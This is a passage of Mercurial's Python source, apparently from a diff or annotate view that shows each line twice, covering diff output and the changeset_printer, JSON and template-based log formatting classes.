1411 if fp is None:
1412 write = ui.write
1412 write = ui.write
1413 else:
1413 else:
1414 def write(s, **kw):
1414 def write(s, **kw):
1415 fp.write(s)
1415 fp.write(s)
1416
1416
1417 if root:
1417 if root:
1418 relroot = pathutil.canonpath(repo.root, repo.getcwd(), root)
1418 relroot = pathutil.canonpath(repo.root, repo.getcwd(), root)
1419 else:
1419 else:
1420 relroot = ''
1420 relroot = ''
1421 if relroot != '':
1421 if relroot != '':
1422 # XXX relative roots currently don't work if the root is within a
1422 # XXX relative roots currently don't work if the root is within a
1423 # subrepo
1423 # subrepo
1424 uirelroot = match.uipath(relroot)
1424 uirelroot = match.uipath(relroot)
1425 relroot += '/'
1425 relroot += '/'
1426 for matchroot in match.files():
1426 for matchroot in match.files():
1427 if not matchroot.startswith(relroot):
1427 if not matchroot.startswith(relroot):
1428 ui.warn(_('warning: %s not inside relative root %s\n') % (
1428 ui.warn(_('warning: %s not inside relative root %s\n') % (
1429 match.uipath(matchroot), uirelroot))
1429 match.uipath(matchroot), uirelroot))
1430
1430
1431 if stat:
1431 if stat:
1432 diffopts = diffopts.copy(context=0)
1432 diffopts = diffopts.copy(context=0)
1433 width = 80
1433 width = 80
1434 if not ui.plain():
1434 if not ui.plain():
1435 width = ui.termwidth()
1435 width = ui.termwidth()
1436 chunks = patch.diff(repo, node1, node2, match, changes, diffopts,
1436 chunks = patch.diff(repo, node1, node2, match, changes, diffopts,
1437 prefix=prefix, relroot=relroot)
1437 prefix=prefix, relroot=relroot)
1438 for chunk, label in patch.diffstatui(util.iterlines(chunks),
1438 for chunk, label in patch.diffstatui(util.iterlines(chunks),
1439 width=width):
1439 width=width):
1440 write(chunk, label=label)
1440 write(chunk, label=label)
1441 else:
1441 else:
1442 for chunk, label in patch.diffui(repo, node1, node2, match,
1442 for chunk, label in patch.diffui(repo, node1, node2, match,
1443 changes, diffopts, prefix=prefix,
1443 changes, diffopts, prefix=prefix,
1444 relroot=relroot):
1444 relroot=relroot):
1445 write(chunk, label=label)
1445 write(chunk, label=label)
1446
1446
1447 if listsubrepos:
1447 if listsubrepos:
1448 ctx1 = repo[node1]
1448 ctx1 = repo[node1]
1449 ctx2 = repo[node2]
1449 ctx2 = repo[node2]
1450 for subpath, sub in scmutil.itersubrepos(ctx1, ctx2):
1450 for subpath, sub in scmutil.itersubrepos(ctx1, ctx2):
1451 tempnode2 = node2
1451 tempnode2 = node2
1452 try:
1452 try:
1453 if node2 is not None:
1453 if node2 is not None:
1454 tempnode2 = ctx2.substate[subpath][1]
1454 tempnode2 = ctx2.substate[subpath][1]
1455 except KeyError:
1455 except KeyError:
1456 # A subrepo that existed in node1 was deleted between node1 and
1456 # A subrepo that existed in node1 was deleted between node1 and
1457 # node2 (inclusive). Thus, ctx2's substate won't contain that
1457 # node2 (inclusive). Thus, ctx2's substate won't contain that
1458 # subpath. The best we can do is to ignore it.
1458 # subpath. The best we can do is to ignore it.
1459 tempnode2 = None
1459 tempnode2 = None
1460 submatch = matchmod.subdirmatcher(subpath, match)
1460 submatch = matchmod.subdirmatcher(subpath, match)
1461 sub.diff(ui, diffopts, tempnode2, submatch, changes=changes,
1461 sub.diff(ui, diffopts, tempnode2, submatch, changes=changes,
1462 stat=stat, fp=fp, prefix=prefix)
1462 stat=stat, fp=fp, prefix=prefix)
1463
1463
1464 def _changesetlabels(ctx):
1464 def _changesetlabels(ctx):
1465 labels = ['log.changeset', 'changeset.%s' % ctx.phasestr()]
1465 labels = ['log.changeset', 'changeset.%s' % ctx.phasestr()]
1466 if ctx.obsolete():
1466 if ctx.obsolete():
1467 labels.append('changeset.obsolete')
1467 labels.append('changeset.obsolete')
1468 if ctx.isunstable():
1468 if ctx.isunstable():
1469 labels.append('changeset.troubled')
1469 labels.append('changeset.troubled')
1470 for instability in ctx.instabilities():
1470 for instability in ctx.instabilities():
1471 labels.append('trouble.%s' % instability)
1471 labels.append('trouble.%s' % instability)
1472 return ' '.join(labels)
1472 return ' '.join(labels)
1473
1473
1474 class changeset_printer(object):
1474 class changeset_printer(object):
1475 '''show changeset information when templating not requested.'''
1475 '''show changeset information when templating not requested.'''
1476
1476
1477 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1477 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1478 self.ui = ui
1478 self.ui = ui
1479 self.repo = repo
1479 self.repo = repo
1480 self.buffered = buffered
1480 self.buffered = buffered
1481 self.matchfn = matchfn
1481 self.matchfn = matchfn
1482 self.diffopts = diffopts
1482 self.diffopts = diffopts
1483 self.header = {}
1483 self.header = {}
1484 self.hunk = {}
1484 self.hunk = {}
1485 self.lastheader = None
1485 self.lastheader = None
1486 self.footer = None
1486 self.footer = None
1487
1487
1488 def flush(self, ctx):
1488 def flush(self, ctx):
1489 rev = ctx.rev()
1489 rev = ctx.rev()
1490 if rev in self.header:
1490 if rev in self.header:
1491 h = self.header[rev]
1491 h = self.header[rev]
1492 if h != self.lastheader:
1492 if h != self.lastheader:
1493 self.lastheader = h
1493 self.lastheader = h
1494 self.ui.write(h)
1494 self.ui.write(h)
1495 del self.header[rev]
1495 del self.header[rev]
1496 if rev in self.hunk:
1496 if rev in self.hunk:
1497 self.ui.write(self.hunk[rev])
1497 self.ui.write(self.hunk[rev])
1498 del self.hunk[rev]
1498 del self.hunk[rev]
1499 return 1
1499 return 1
1500 return 0
1500 return 0
1501
1501
1502 def close(self):
1502 def close(self):
1503 if self.footer:
1503 if self.footer:
1504 self.ui.write(self.footer)
1504 self.ui.write(self.footer)
1505
1505
1506 def show(self, ctx, copies=None, matchfn=None, **props):
1506 def show(self, ctx, copies=None, matchfn=None, **props):
1507 props = pycompat.byteskwargs(props)
1507 props = pycompat.byteskwargs(props)
1508 if self.buffered:
1508 if self.buffered:
1509 self.ui.pushbuffer(labeled=True)
1509 self.ui.pushbuffer(labeled=True)
1510 self._show(ctx, copies, matchfn, props)
1510 self._show(ctx, copies, matchfn, props)
1511 self.hunk[ctx.rev()] = self.ui.popbuffer()
1511 self.hunk[ctx.rev()] = self.ui.popbuffer()
1512 else:
1512 else:
1513 self._show(ctx, copies, matchfn, props)
1513 self._show(ctx, copies, matchfn, props)
1514
1514
1515 def _show(self, ctx, copies, matchfn, props):
1515 def _show(self, ctx, copies, matchfn, props):
1516 '''show a single changeset or file revision'''
1516 '''show a single changeset or file revision'''
1517 changenode = ctx.node()
1517 changenode = ctx.node()
1518 rev = ctx.rev()
1518 rev = ctx.rev()
1519 if self.ui.debugflag:
1519 if self.ui.debugflag:
1520 hexfunc = hex
1520 hexfunc = hex
1521 else:
1521 else:
1522 hexfunc = short
1522 hexfunc = short
1523 # as of now, wctx.node() and wctx.rev() return None, but we want to
1523 # as of now, wctx.node() and wctx.rev() return None, but we want to
1524 # show the same values as {node} and {rev} templatekw
1524 # show the same values as {node} and {rev} templatekw
1525 revnode = (scmutil.intrev(ctx), hexfunc(scmutil.binnode(ctx)))
1525 revnode = (scmutil.intrev(ctx), hexfunc(scmutil.binnode(ctx)))
1526
1526
1527 if self.ui.quiet:
1527 if self.ui.quiet:
1528 self.ui.write("%d:%s\n" % revnode, label='log.node')
1528 self.ui.write("%d:%s\n" % revnode, label='log.node')
1529 return
1529 return
1530
1530
1531 date = util.datestr(ctx.date())
1531 date = util.datestr(ctx.date())
1532
1532
1533 # i18n: column positioning for "hg log"
1533 # i18n: column positioning for "hg log"
1534 self.ui.write(_("changeset: %d:%s\n") % revnode,
1534 self.ui.write(_("changeset: %d:%s\n") % revnode,
1535 label=_changesetlabels(ctx))
1535 label=_changesetlabels(ctx))
1536
1536
1537 # branches are shown first before any other names due to backwards
1537 # branches are shown first before any other names due to backwards
1538 # compatibility
1538 # compatibility
1539 branch = ctx.branch()
1539 branch = ctx.branch()
1540 # don't show the default branch name
1540 # don't show the default branch name
1541 if branch != 'default':
1541 if branch != 'default':
1542 # i18n: column positioning for "hg log"
1542 # i18n: column positioning for "hg log"
1543 self.ui.write(_("branch: %s\n") % branch,
1543 self.ui.write(_("branch: %s\n") % branch,
1544 label='log.branch')
1544 label='log.branch')
1545
1545
1546 for nsname, ns in self.repo.names.iteritems():
1546 for nsname, ns in self.repo.names.iteritems():
1547 # branches has special logic already handled above, so here we just
1547 # branches has special logic already handled above, so here we just
1548 # skip it
1548 # skip it
1549 if nsname == 'branches':
1549 if nsname == 'branches':
1550 continue
1550 continue
1551 # we will use the templatename as the color name since those two
1551 # we will use the templatename as the color name since those two
1552 # should be the same
1552 # should be the same
1553 for name in ns.names(self.repo, changenode):
1553 for name in ns.names(self.repo, changenode):
1554 self.ui.write(ns.logfmt % name,
1554 self.ui.write(ns.logfmt % name,
1555 label='log.%s' % ns.colorname)
1555 label='log.%s' % ns.colorname)
1556 if self.ui.debugflag:
1556 if self.ui.debugflag:
1557 # i18n: column positioning for "hg log"
1557 # i18n: column positioning for "hg log"
1558 self.ui.write(_("phase: %s\n") % ctx.phasestr(),
1558 self.ui.write(_("phase: %s\n") % ctx.phasestr(),
1559 label='log.phase')
1559 label='log.phase')
1560 for pctx in scmutil.meaningfulparents(self.repo, ctx):
1560 for pctx in scmutil.meaningfulparents(self.repo, ctx):
1561 label = 'log.parent changeset.%s' % pctx.phasestr()
1561 label = 'log.parent changeset.%s' % pctx.phasestr()
1562 # i18n: column positioning for "hg log"
1562 # i18n: column positioning for "hg log"
1563 self.ui.write(_("parent: %d:%s\n")
1563 self.ui.write(_("parent: %d:%s\n")
1564 % (pctx.rev(), hexfunc(pctx.node())),
1564 % (pctx.rev(), hexfunc(pctx.node())),
1565 label=label)
1565 label=label)
1566
1566
1567 if self.ui.debugflag and rev is not None:
1567 if self.ui.debugflag and rev is not None:
1568 mnode = ctx.manifestnode()
1568 mnode = ctx.manifestnode()
1569 # i18n: column positioning for "hg log"
1569 # i18n: column positioning for "hg log"
1570 self.ui.write(_("manifest: %d:%s\n") %
1570 self.ui.write(_("manifest: %d:%s\n") %
1571 (self.repo.manifestlog._revlog.rev(mnode),
1571 (self.repo.manifestlog._revlog.rev(mnode),
1572 hex(mnode)),
1572 hex(mnode)),
1573 label='ui.debug log.manifest')
1573 label='ui.debug log.manifest')
1574 # i18n: column positioning for "hg log"
1574 # i18n: column positioning for "hg log"
1575 self.ui.write(_("user: %s\n") % ctx.user(),
1575 self.ui.write(_("user: %s\n") % ctx.user(),
1576 label='log.user')
1576 label='log.user')
1577 # i18n: column positioning for "hg log"
1577 # i18n: column positioning for "hg log"
1578 self.ui.write(_("date: %s\n") % date,
1578 self.ui.write(_("date: %s\n") % date,
1579 label='log.date')
1579 label='log.date')
1580
1580
1581 if ctx.isunstable():
1581 if ctx.isunstable():
1582 # i18n: column positioning for "hg log"
1582 # i18n: column positioning for "hg log"
1583 instabilities = ctx.instabilities()
1583 instabilities = ctx.instabilities()
1584 self.ui.write(_("instability: %s\n") % ', '.join(instabilities),
1584 self.ui.write(_("instability: %s\n") % ', '.join(instabilities),
1585 label='log.trouble')
1585 label='log.trouble')
1586
1586
1587 self._exthook(ctx)
1587 self._exthook(ctx)
1588
1588
1589 if self.ui.debugflag:
1589 if self.ui.debugflag:
1590 files = ctx.p1().status(ctx)[:3]
1590 files = ctx.p1().status(ctx)[:3]
1591 for key, value in zip([# i18n: column positioning for "hg log"
1591 for key, value in zip([# i18n: column positioning for "hg log"
1592 _("files:"),
1592 _("files:"),
1593 # i18n: column positioning for "hg log"
1593 # i18n: column positioning for "hg log"
1594 _("files+:"),
1594 _("files+:"),
1595 # i18n: column positioning for "hg log"
1595 # i18n: column positioning for "hg log"
1596 _("files-:")], files):
1596 _("files-:")], files):
1597 if value:
1597 if value:
1598 self.ui.write("%-12s %s\n" % (key, " ".join(value)),
1598 self.ui.write("%-12s %s\n" % (key, " ".join(value)),
1599 label='ui.debug log.files')
1599 label='ui.debug log.files')
1600 elif ctx.files() and self.ui.verbose:
1600 elif ctx.files() and self.ui.verbose:
1601 # i18n: column positioning for "hg log"
1601 # i18n: column positioning for "hg log"
1602 self.ui.write(_("files: %s\n") % " ".join(ctx.files()),
1602 self.ui.write(_("files: %s\n") % " ".join(ctx.files()),
1603 label='ui.note log.files')
1603 label='ui.note log.files')
1604 if copies and self.ui.verbose:
1604 if copies and self.ui.verbose:
1605 copies = ['%s (%s)' % c for c in copies]
1605 copies = ['%s (%s)' % c for c in copies]
1606 # i18n: column positioning for "hg log"
1606 # i18n: column positioning for "hg log"
1607 self.ui.write(_("copies: %s\n") % ' '.join(copies),
1607 self.ui.write(_("copies: %s\n") % ' '.join(copies),
1608 label='ui.note log.copies')
1608 label='ui.note log.copies')
1609
1609
1610 extra = ctx.extra()
1610 extra = ctx.extra()
1611 if extra and self.ui.debugflag:
1611 if extra and self.ui.debugflag:
1612 for key, value in sorted(extra.items()):
1612 for key, value in sorted(extra.items()):
1613 # i18n: column positioning for "hg log"
1613 # i18n: column positioning for "hg log"
1614 self.ui.write(_("extra: %s=%s\n")
1614 self.ui.write(_("extra: %s=%s\n")
1615 % (key, util.escapestr(value)),
1615 % (key, util.escapestr(value)),
1616 label='ui.debug log.extra')
1616 label='ui.debug log.extra')
1617
1617
1618 description = ctx.description().strip()
1618 description = ctx.description().strip()
1619 if description:
1619 if description:
1620 if self.ui.verbose:
1620 if self.ui.verbose:
1621 self.ui.write(_("description:\n"),
1621 self.ui.write(_("description:\n"),
1622 label='ui.note log.description')
1622 label='ui.note log.description')
1623 self.ui.write(description,
1623 self.ui.write(description,
1624 label='ui.note log.description')
1624 label='ui.note log.description')
1625 self.ui.write("\n\n")
1625 self.ui.write("\n\n")
1626 else:
1626 else:
1627 # i18n: column positioning for "hg log"
1627 # i18n: column positioning for "hg log"
1628 self.ui.write(_("summary: %s\n") %
1628 self.ui.write(_("summary: %s\n") %
1629 description.splitlines()[0],
1629 description.splitlines()[0],
1630 label='log.summary')
1630 label='log.summary')
1631 self.ui.write("\n")
1631 self.ui.write("\n")
1632
1632
1633 self.showpatch(ctx, matchfn)
1633 self.showpatch(ctx, matchfn)
1634
1634
1635 def _exthook(self, ctx):
1635 def _exthook(self, ctx):
1636 '''empty method used by extension as a hook point
1636 '''empty method used by extension as a hook point
1637 '''
1637 '''
1638 pass
1638 pass
1639
1639
1640 def showpatch(self, ctx, matchfn):
1640 def showpatch(self, ctx, matchfn):
1641 if not matchfn:
1641 if not matchfn:
1642 matchfn = self.matchfn
1642 matchfn = self.matchfn
1643 if matchfn:
1643 if matchfn:
1644 stat = self.diffopts.get('stat')
1644 stat = self.diffopts.get('stat')
1645 diff = self.diffopts.get('patch')
1645 diff = self.diffopts.get('patch')
1646 diffopts = patch.diffallopts(self.ui, self.diffopts)
1646 diffopts = patch.diffallopts(self.ui, self.diffopts)
1647 node = ctx.node()
1647 node = ctx.node()
1648 prev = ctx.p1().node()
1648 prev = ctx.p1().node()
1649 if stat:
1649 if stat:
1650 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1650 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1651 match=matchfn, stat=True)
1651 match=matchfn, stat=True)
1652 if diff:
1652 if diff:
1653 if stat:
1653 if stat:
1654 self.ui.write("\n")
1654 self.ui.write("\n")
1655 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1655 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1656 match=matchfn, stat=False)
1656 match=matchfn, stat=False)
1657 self.ui.write("\n")
1657 self.ui.write("\n")
1658
1658
1659 class jsonchangeset(changeset_printer):
1659 class jsonchangeset(changeset_printer):
1660 '''format changeset information.'''
1660 '''format changeset information.'''
1661
1661
1662 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1662 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1663 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1663 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1664 self.cache = {}
1664 self.cache = {}
1665 self._first = True
1665 self._first = True
1666
1666
1667 def close(self):
1667 def close(self):
1668 if not self._first:
1668 if not self._first:
1669 self.ui.write("\n]\n")
1669 self.ui.write("\n]\n")
1670 else:
1670 else:
1671 self.ui.write("[]\n")
1671 self.ui.write("[]\n")
1672
1672
1673 def _show(self, ctx, copies, matchfn, props):
1673 def _show(self, ctx, copies, matchfn, props):
1674 '''show a single changeset or file revision'''
1674 '''show a single changeset or file revision'''
1675 rev = ctx.rev()
1675 rev = ctx.rev()
1676 if rev is None:
1676 if rev is None:
1677 jrev = jnode = 'null'
1677 jrev = jnode = 'null'
1678 else:
1678 else:
1679 jrev = '%d' % rev
1679 jrev = '%d' % rev
1680 jnode = '"%s"' % hex(ctx.node())
1680 jnode = '"%s"' % hex(ctx.node())
1681 j = encoding.jsonescape
1681 j = encoding.jsonescape
1682
1682
1683 if self._first:
1683 if self._first:
1684 self.ui.write("[\n {")
1684 self.ui.write("[\n {")
1685 self._first = False
1685 self._first = False
1686 else:
1686 else:
1687 self.ui.write(",\n {")
1687 self.ui.write(",\n {")
1688
1688
1689 if self.ui.quiet:
1689 if self.ui.quiet:
1690 self.ui.write(('\n "rev": %s') % jrev)
1690 self.ui.write(('\n "rev": %s') % jrev)
1691 self.ui.write((',\n "node": %s') % jnode)
1691 self.ui.write((',\n "node": %s') % jnode)
1692 self.ui.write('\n }')
1692 self.ui.write('\n }')
1693 return
1693 return
1694
1694
1695 self.ui.write(('\n "rev": %s') % jrev)
1695 self.ui.write(('\n "rev": %s') % jrev)
1696 self.ui.write((',\n "node": %s') % jnode)
1696 self.ui.write((',\n "node": %s') % jnode)
1697 self.ui.write((',\n "branch": "%s"') % j(ctx.branch()))
1697 self.ui.write((',\n "branch": "%s"') % j(ctx.branch()))
1698 self.ui.write((',\n "phase": "%s"') % ctx.phasestr())
1698 self.ui.write((',\n "phase": "%s"') % ctx.phasestr())
1699 self.ui.write((',\n "user": "%s"') % j(ctx.user()))
1699 self.ui.write((',\n "user": "%s"') % j(ctx.user()))
1700 self.ui.write((',\n "date": [%d, %d]') % ctx.date())
1700 self.ui.write((',\n "date": [%d, %d]') % ctx.date())
1701 self.ui.write((',\n "desc": "%s"') % j(ctx.description()))
1701 self.ui.write((',\n "desc": "%s"') % j(ctx.description()))
1702
1702
1703 self.ui.write((',\n "bookmarks": [%s]') %
1703 self.ui.write((',\n "bookmarks": [%s]') %
1704 ", ".join('"%s"' % j(b) for b in ctx.bookmarks()))
1704 ", ".join('"%s"' % j(b) for b in ctx.bookmarks()))
1705 self.ui.write((',\n "tags": [%s]') %
1705 self.ui.write((',\n "tags": [%s]') %
1706 ", ".join('"%s"' % j(t) for t in ctx.tags()))
1706 ", ".join('"%s"' % j(t) for t in ctx.tags()))
1707 self.ui.write((',\n "parents": [%s]') %
1707 self.ui.write((',\n "parents": [%s]') %
1708 ", ".join('"%s"' % c.hex() for c in ctx.parents()))
1708 ", ".join('"%s"' % c.hex() for c in ctx.parents()))
1709
1709
1710 if self.ui.debugflag:
1710 if self.ui.debugflag:
1711 if rev is None:
1711 if rev is None:
1712 jmanifestnode = 'null'
1712 jmanifestnode = 'null'
1713 else:
1713 else:
1714 jmanifestnode = '"%s"' % hex(ctx.manifestnode())
1714 jmanifestnode = '"%s"' % hex(ctx.manifestnode())
1715 self.ui.write((',\n "manifest": %s') % jmanifestnode)
1715 self.ui.write((',\n "manifest": %s') % jmanifestnode)
1716
1716
1717 self.ui.write((',\n "extra": {%s}') %
1717 self.ui.write((',\n "extra": {%s}') %
1718 ", ".join('"%s": "%s"' % (j(k), j(v))
1718 ", ".join('"%s": "%s"' % (j(k), j(v))
1719 for k, v in ctx.extra().items()))
1719 for k, v in ctx.extra().items()))
1720
1720
1721 files = ctx.p1().status(ctx)
1721 files = ctx.p1().status(ctx)
1722 self.ui.write((',\n "modified": [%s]') %
1722 self.ui.write((',\n "modified": [%s]') %
1723 ", ".join('"%s"' % j(f) for f in files[0]))
1723 ", ".join('"%s"' % j(f) for f in files[0]))
1724 self.ui.write((',\n "added": [%s]') %
1724 self.ui.write((',\n "added": [%s]') %
1725 ", ".join('"%s"' % j(f) for f in files[1]))
1725 ", ".join('"%s"' % j(f) for f in files[1]))
1726 self.ui.write((',\n "removed": [%s]') %
1726 self.ui.write((',\n "removed": [%s]') %
1727 ", ".join('"%s"' % j(f) for f in files[2]))
1727 ", ".join('"%s"' % j(f) for f in files[2]))
1728
1728
1729 elif self.ui.verbose:
1729 elif self.ui.verbose:
1730 self.ui.write((',\n "files": [%s]') %
1730 self.ui.write((',\n "files": [%s]') %
1731 ", ".join('"%s"' % j(f) for f in ctx.files()))
1731 ", ".join('"%s"' % j(f) for f in ctx.files()))
1732
1732
1733 if copies:
1733 if copies:
1734 self.ui.write((',\n "copies": {%s}') %
1734 self.ui.write((',\n "copies": {%s}') %
1735 ", ".join('"%s": "%s"' % (j(k), j(v))
1735 ", ".join('"%s": "%s"' % (j(k), j(v))
1736 for k, v in copies))
1736 for k, v in copies))
1737
1737
1738 matchfn = self.matchfn
1738 matchfn = self.matchfn
1739 if matchfn:
1739 if matchfn:
1740 stat = self.diffopts.get('stat')
1740 stat = self.diffopts.get('stat')
1741 diff = self.diffopts.get('patch')
1741 diff = self.diffopts.get('patch')
1742 diffopts = patch.difffeatureopts(self.ui, self.diffopts, git=True)
1742 diffopts = patch.difffeatureopts(self.ui, self.diffopts, git=True)
1743 node, prev = ctx.node(), ctx.p1().node()
1743 node, prev = ctx.node(), ctx.p1().node()
1744 if stat:
1744 if stat:
1745 self.ui.pushbuffer()
1745 self.ui.pushbuffer()
1746 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1746 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1747 match=matchfn, stat=True)
1747 match=matchfn, stat=True)
1748 self.ui.write((',\n "diffstat": "%s"')
1748 self.ui.write((',\n "diffstat": "%s"')
1749 % j(self.ui.popbuffer()))
1749 % j(self.ui.popbuffer()))
1750 if diff:
1750 if diff:
1751 self.ui.pushbuffer()
1751 self.ui.pushbuffer()
1752 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1752 diffordiffstat(self.ui, self.repo, diffopts, prev, node,
1753 match=matchfn, stat=False)
1753 match=matchfn, stat=False)
1754 self.ui.write((',\n "diff": "%s"') % j(self.ui.popbuffer()))
1754 self.ui.write((',\n "diff": "%s"') % j(self.ui.popbuffer()))
1755
1755
1756 self.ui.write("\n }")
1756 self.ui.write("\n }")
1757
1757
1758 class changeset_templater(changeset_printer):
1758 class changeset_templater(changeset_printer):
1759 '''format changeset information.'''
1759 '''format changeset information.'''
1760
1760
1761 # Arguments before "buffered" used to be positional. Consider not
1761 # Arguments before "buffered" used to be positional. Consider not
1762 # adding/removing arguments before "buffered" to not break callers.
1762 # adding/removing arguments before "buffered" to not break callers.
1763 def __init__(self, ui, repo, tmplspec, matchfn=None, diffopts=None,
1763 def __init__(self, ui, repo, tmplspec, matchfn=None, diffopts=None,
1764 buffered=False):
1764 buffered=False):
1765 diffopts = diffopts or {}
1765 diffopts = diffopts or {}
1766
1766
1767 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1767 changeset_printer.__init__(self, ui, repo, matchfn, diffopts, buffered)
1768 self.t = formatter.loadtemplater(ui, tmplspec,
1768 self.t = formatter.loadtemplater(ui, tmplspec,
1769 cache=templatekw.defaulttempl)
1769 cache=templatekw.defaulttempl)
1770 self._counter = itertools.count()
1770 self._counter = itertools.count()
1771 self.cache = {}
1771 self.cache = {}
1772
1772
1773 self._tref = tmplspec.ref
1773 self._tref = tmplspec.ref
1774 self._parts = {'header': '', 'footer': '',
1774 self._parts = {'header': '', 'footer': '',
1775 tmplspec.ref: tmplspec.ref,
1775 tmplspec.ref: tmplspec.ref,
1776 'docheader': '', 'docfooter': '',
1776 'docheader': '', 'docfooter': '',
1777 'separator': ''}
1777 'separator': ''}
1778 if tmplspec.mapfile:
1778 if tmplspec.mapfile:
1779 # find correct templates for current mode, for backward
1779 # find correct templates for current mode, for backward
1780 # compatibility with 'log -v/-q/--debug' using a mapfile
1780 # compatibility with 'log -v/-q/--debug' using a mapfile
1781 tmplmodes = [
1781 tmplmodes = [
1782 (True, ''),
1782 (True, ''),
1783 (self.ui.verbose, '_verbose'),
1783 (self.ui.verbose, '_verbose'),
1784 (self.ui.quiet, '_quiet'),
1784 (self.ui.quiet, '_quiet'),
1785 (self.ui.debugflag, '_debug'),
1785 (self.ui.debugflag, '_debug'),
1786 ]
1786 ]
1787 for mode, postfix in tmplmodes:
1787 for mode, postfix in tmplmodes:
1788 for t in self._parts:
1788 for t in self._parts:
1789 cur = t + postfix
1789 cur = t + postfix
1790 if mode and cur in self.t:
1790 if mode and cur in self.t:
1791 self._parts[t] = cur
1791 self._parts[t] = cur
1792 else:
1792 else:
1793 partnames = [p for p in self._parts.keys() if p != tmplspec.ref]
1793 partnames = [p for p in self._parts.keys() if p != tmplspec.ref]
1794 m = formatter.templatepartsmap(tmplspec, self.t, partnames)
1794 m = formatter.templatepartsmap(tmplspec, self.t, partnames)
1795 self._parts.update(m)
1795 self._parts.update(m)
1796
1796
1797 if self._parts['docheader']:
1797 if self._parts['docheader']:
1798 self.ui.write(templater.stringify(self.t(self._parts['docheader'])))
1798 self.ui.write(templater.stringify(self.t(self._parts['docheader'])))
1799
1799
1800 def close(self):
1800 def close(self):
1801 if self._parts['docfooter']:
1801 if self._parts['docfooter']:
1802 if not self.footer:
1802 if not self.footer:
1803 self.footer = ""
1803 self.footer = ""
1804 self.footer += templater.stringify(self.t(self._parts['docfooter']))
1804 self.footer += templater.stringify(self.t(self._parts['docfooter']))
1805 return super(changeset_templater, self).close()
1805 return super(changeset_templater, self).close()
1806
1806
1807 def _show(self, ctx, copies, matchfn, props):
1807 def _show(self, ctx, copies, matchfn, props):
1808 '''show a single changeset or file revision'''
1808 '''show a single changeset or file revision'''
1809 props = props.copy()
1809 props = props.copy()
1810 props.update(templatekw.keywords)
1810 props.update(templatekw.keywords)
1811 props['templ'] = self.t
1811 props['templ'] = self.t
1812 props['ctx'] = ctx
1812 props['ctx'] = ctx
1813 props['repo'] = self.repo
1813 props['repo'] = self.repo
1814 props['ui'] = self.repo.ui
1814 props['ui'] = self.repo.ui
1815 props['index'] = index = next(self._counter)
1815 props['index'] = index = next(self._counter)
1816 props['revcache'] = {'copies': copies}
1816 props['revcache'] = {'copies': copies}
1817 props['cache'] = self.cache
1817 props['cache'] = self.cache
1818 props = pycompat.strkwargs(props)
1818 props = pycompat.strkwargs(props)
1819
1819
1820 # write separator, which wouldn't work well with the header part below
1820 # write separator, which wouldn't work well with the header part below
1821 # since there's inherently a conflict between header (across items) and
1821 # since there's inherently a conflict between header (across items) and
1822 # separator (per item)
1822 # separator (per item)
1823 if self._parts['separator'] and index > 0:
1823 if self._parts['separator'] and index > 0:
1824 self.ui.write(templater.stringify(self.t(self._parts['separator'])))
1824 self.ui.write(templater.stringify(self.t(self._parts['separator'])))
1825
1825
1826 # write header
1826 # write header
1827 if self._parts['header']:
1827 if self._parts['header']:
1828 h = templater.stringify(self.t(self._parts['header'], **props))
1828 h = templater.stringify(self.t(self._parts['header'], **props))
1829 if self.buffered:
1829 if self.buffered:
1830 self.header[ctx.rev()] = h
1830 self.header[ctx.rev()] = h
1831 else:
1831 else:
1832 if self.lastheader != h:
1832 if self.lastheader != h:
1833 self.lastheader = h
1833 self.lastheader = h
1834 self.ui.write(h)
1834 self.ui.write(h)
1835
1835
1836 # write changeset metadata, then patch if requested
1836 # write changeset metadata, then patch if requested
1837 key = self._parts[self._tref]
1837 key = self._parts[self._tref]
1838 self.ui.write(templater.stringify(self.t(key, **props)))
1838 self.ui.write(templater.stringify(self.t(key, **props)))
1839 self.showpatch(ctx, matchfn)
1839 self.showpatch(ctx, matchfn)
1840
1840
1841 if self._parts['footer']:
1841 if self._parts['footer']:
1842 if not self.footer:
1842 if not self.footer:
1843 self.footer = templater.stringify(
1843 self.footer = templater.stringify(
1844 self.t(self._parts['footer'], **props))
1844 self.t(self._parts['footer'], **props))
1845
1845
1846 def logtemplatespec(tmpl, mapfile):
1846 def logtemplatespec(tmpl, mapfile):
1847 if mapfile:
1847 if mapfile:
1848 return formatter.templatespec('changeset', tmpl, mapfile)
1848 return formatter.templatespec('changeset', tmpl, mapfile)
1849 else:
1849 else:
1850 return formatter.templatespec('', tmpl, None)
1850 return formatter.templatespec('', tmpl, None)
1851
1851
1852 def _lookuplogtemplate(ui, tmpl, style):
1852 def _lookuplogtemplate(ui, tmpl, style):
1853 """Find the template matching the given template spec or style
1853 """Find the template matching the given template spec or style
1854
1854
1855 See formatter.lookuptemplate() for details.
1855 See formatter.lookuptemplate() for details.
1856 """
1856 """
1857
1857
1858 # ui settings
1858 # ui settings
1859 if not tmpl and not style: # template are stronger than style
1859 if not tmpl and not style: # template are stronger than style
1860 tmpl = ui.config('ui', 'logtemplate')
1860 tmpl = ui.config('ui', 'logtemplate')
1861 if tmpl:
1861 if tmpl:
1862 return logtemplatespec(templater.unquotestring(tmpl), None)
1862 return logtemplatespec(templater.unquotestring(tmpl), None)
1863 else:
1863 else:
1864 style = util.expandpath(ui.config('ui', 'style'))
1864 style = util.expandpath(ui.config('ui', 'style'))
1865
1865
1866 if not tmpl and style:
1866 if not tmpl and style:
1867 mapfile = style
1867 mapfile = style
1868 if not os.path.split(mapfile)[0]:
1868 if not os.path.split(mapfile)[0]:
1869 mapname = (templater.templatepath('map-cmdline.' + mapfile)
1869 mapname = (templater.templatepath('map-cmdline.' + mapfile)
1870 or templater.templatepath(mapfile))
1870 or templater.templatepath(mapfile))
1871 if mapname:
1871 if mapname:
1872 mapfile = mapname
1872 mapfile = mapname
1873 return logtemplatespec(None, mapfile)
1873 return logtemplatespec(None, mapfile)
1874
1874
1875 if not tmpl:
1875 if not tmpl:
